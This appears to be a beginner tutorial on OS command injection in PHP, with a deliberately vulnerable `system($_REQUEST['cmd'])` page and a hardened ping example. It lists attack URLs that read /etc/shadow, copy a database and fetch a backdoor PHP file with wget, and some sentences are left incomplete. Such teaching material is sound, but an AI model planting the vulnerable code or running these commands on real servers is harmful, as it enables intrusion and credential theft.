OS Command Injection Vulnerability
Suppose our target address is www.victim.com/vultest/lame.php
And the source code:
<p><b>We will test OS command injection vulnerability against this pages. Actually developer don’t know how serious the code is.</b></p>
<p><b>Output of command:</b></p>
<p><b><i>This is how OS command injection vulnerability works.</i></b></p>
The page also contains this PHP code:
<?php system($_REQUEST['cmd']); ?>
(This is white box... Just copy it and paste it into a PHP web page for practice purposes.)
This is the OS command injection vulnerability. Because of this simple mistake, anyone can run any OS-specific command against the server/website.
So if we run a simple command, "ping":
We get the reply on the page (along with the other contents). In a real-world test we may not see the reply, but the response is delayed for some time (4-10 seconds?). If this is the case, then we can run any command, such as "ls".
If any of these statements is in the source code:
Then there is strong reason to suspect that the site is vulnerable.
Suppose we don't have the source code; how do we test then? The way is fuzzing (with tools or manually). Sometimes we call it black box testing.
To test it we need to write some code for fuzzing, or we can use ready-made tools that are freely downloadable from the internet, such as Burp Suite, wfuzz, or a vulnerability scanner, or test manually by hand. I think you have the logic for automated testing; otherwise you will get some "False" results from your lam0 tools...
Note: We are doing this on localhost.
We can run any command:
http://localhost/vultest/lame.php?cmd=cat /etc/shadow (requires root)
http://localhost/vultest/lame.php?cmd=cp /db/to/mysql /here
http://localhost/vultest/lame.php?cmd=cat wget 192.168.1.212/bacdoor.php
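A hardened counterpart to the `system($_REQUEST['cmd'])` page, as an added example that is not part of the original post: it runs one fixed program (ping, the command used above), accepts only a literal IPv4 address as its argument, and starts the process without a shell. The `host` parameter, the function names and the `/bin/ping` path are assumptions for illustration.

```php
<?php
declare(strict_types=1);
// Added example (not from the original post). Vulnerable form for comparison:
//     system($_REQUEST['cmd']);   // caller chooses the whole command line
// Hardened form: the program is fixed, the caller supplies one validated argument.

const PING_BIN = '/bin/ping'; // assumed path; adjust for the host

/** Return the input as a literal IPv4 address, or null if it is anything else. */
function validate_target(string $input): ?string
{
    $ip = filter_var(trim($input), FILTER_VALIDATE_IP, FILTER_FLAG_IPV4);
    return $ip === false ? null : $ip;
}

/** Run one ping without a shell and return its output. */
function run_ping(string $ip): string
{
    // Array form of proc_open (PHP 7.4+) executes the binary directly,
    // so no shell ever parses the argument.
    $cmd  = [PING_BIN, '-c', '1', '-W', '2', $ip];
    $spec = [1 => ['pipe', 'w'], 2 => ['file', '/dev/null', 'w']];
    $proc = proc_open($cmd, $spec, $pipes);
    if (!is_resource($proc)) {
        return 'ping could not be started';
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return $out === false ? '' : $out;
}

// Read only the query string (not $_REQUEST), and reject arrays such as host[]=x.
$raw = $_GET['host'] ?? '';
$ip  = is_string($raw) ? validate_target($raw) : null;

if ($ip === null) {
    http_response_code(400);
    echo 'Invalid host';
} else {
    // Encode the output so command output cannot inject markup into the page.
    echo '<pre>' . htmlspecialchars(run_ping($ip), ENT_QUOTES, 'UTF-8') . '</pre>';
}
```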
I hope I explained it, and now we know what it is and how it can be exploited by hackers. But really it is very basic; you need to be more advanced.
Let me know (firstname.lastname@example.org) if you have any questions.
Good luck !!!